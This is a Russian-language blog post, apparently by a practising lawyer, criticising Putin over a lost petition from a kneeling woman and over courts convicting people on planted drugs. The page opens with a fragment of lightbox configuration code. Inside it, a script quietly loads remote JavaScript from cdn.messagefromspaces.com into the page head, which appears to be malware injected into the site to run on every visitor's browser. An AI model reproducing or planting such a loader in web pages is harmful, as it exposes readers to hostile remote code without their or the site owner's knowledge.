, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему этого Путин не стыдится?

23 Июн

20 июня, во время «прямой линии»  Путин признался, что ему стыдно за потерю записки с просьбой от пожилой женщины, которая упала перед ним на колени.

Вот, как об этом он говорил: «Вдруг появилась женщина такого уже преклонного возраста, что‑то невнятно сказала и вдруг упала на колени, отдала мне записку.

Я сказал, что обязательно посмотрю, забрал, отдал помощникам, а её потеряли. Никогда этого не забуду. Мне и сейчас стыдно. Поэтому всё, что до меня доходит, в руки попадает, я всё стараюсь отработать по полной».

Журналистам удалось узнать https://iz.ru/891806/2019−06−22/stali-izvestny-detali-zapiski-za-poteriu-kotoroi-putinu-stydno?utm_source=yxnews&utm_medium=desktop    подробности истории с утерянной запиской.

Путин приезжал в Сыктывкар в сентябре 2010 года. Елена Щербина в тот день ждала Путина на площади и хотела передать информацию о земельном вопросе для многодетных.

Там же она познакомилась с женщиной по имени Валентина, которая хотела обратиться к Путину по поводу, как она полагала, незаконного осуждения её сына.

«Как рассказал муж Щербаковой, Владимир: «Они скооперировались и договорились, кто первый достигнет конечной точки, тот и сможет передать записку. Они написали две одинаковые записки».

Валентине удалось вырваться из рук охраны, подбежать к Путину. Ее пытались задержать, однако президент попросил отпустить женщину. Со слов супруги. «Она действительно встала на колени, он (президент. — Ред.) попросил ее подняться».

Владимир Щербина также отметил, что через несколько месяцев он увидел по телевизору обращение Путина, которое касалось земель для многодетных семей. Тогда он и Елена решили, что цель была достигнута.

Фактически «утерянной» оказалась записка Валентины, которая касалась её осужденного сына.

События, связанные с журналистом Голуновым доказали всему миру, как на самом деле неправомерно  ведётся борьба с наркобизнесом.

СМИ неоднократно пишут о том, как выбивают признательные показания по тем деяниям, которые заподозренные не совершали.

Методы оперативной деятельности, что были применены в Голунову, применяются десятилетия и  распространены по всей стране, из-за того, что игнорируются требования Конституции России и процессуального законодательства.

При производстве по любому уголовному делу подлежат доказыванию:

-  событие преступления (время, место, способ и другие обстоятельства совершения преступления); —  виновность лица в совершении преступления.

Однако эти требования закона игнорируются. В обвинительных заключениях, а затем и в приговорах пишут: « В неустановленное время, в неустановленном месте, при неустановленных обстоятельствах, приобрёл наркотические средства…»

Поэтому достаточно любым способом назначенному обвиняемым подбросить наркотики, никто не станет выяснять, как они у него оказались.

На все его заявления о том, что ему подбросили наркотики, никто, ни ведомственный контроль, ни прокурорский надзор, ни судебная власть, никак не реагируют.

В этой связи, Путин, как гарант Конституции обязан был организовать работу по проверке всех дел, где судьи признали виновным, указывая в при говоре: «В неустановленное время, в неустановленном месте, при неустановленных обстоятельствах, приобрёл наркотические средства…».

Возможно, так был осужден и сын Валентины, что встала на колени перед Путиным, протягивая ему записки.

Путин знает, что 26 процентов сидельцев — это как раз по статьям, связанным с незаконным оборотом наркотиков. А это сотни тысяч человек.

Но словно не слышит Путин о том, что говорит http://kremlin.ru/events/president/news/60795  ведущий Е. Винник: «И возвращаясь к 228-й статье про наркотики, очень много людей осуждены у нас в стране. И большинство говорят, что им полицейские подбросили, когда пытались доказать».

Путин начинает  говорить об опасности незаконного хранения, перевозки, распространении даже небольших объемов наркотиков. Поэтому никакой либерализации, считает он, здесь быть не может.

Но никто либерализации по наркотикам и не просит. Говорят о неправомерной работе полиции, что наркотики подбрасывает, а ведомственный контроль на это никак не реагирует, как и прокурорский надзор. Нет защиты от этого произвола и в судах, которые обязаны защищать личность от незаконного и необоснованного обвинения, осуждения, ограничения её прав и свобод.

Путин, полагает, что по событиям связанным с журналистом, достаточно «в системе собственной безопасности МВД создать особое отдельное направление, которое контролировало бы эту сферу деятельности».

Как практикующий более 45 лет юрист могу утверждать, что это пустая и затратная затея.

А, как быть с теми, кого по таким «подбросам»  неправомерно  осудили, кому искалечили жизнь, чьих матерей заставили страдать?

Неужели всем матерям, считающим, что их дети осуждены неправомерно, надо также «скооперироваться»,  собраться на Красной Площади и встать на колени, как это сделала Валентина?

Может тогда до Путина дойдут данные о неправомерной правоприменительной практике, тогда  в его руки попадут данные её удостоверяющие, и  он, как гарант Конституции,  устыдится и  всё постарается «отработать по полной».

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.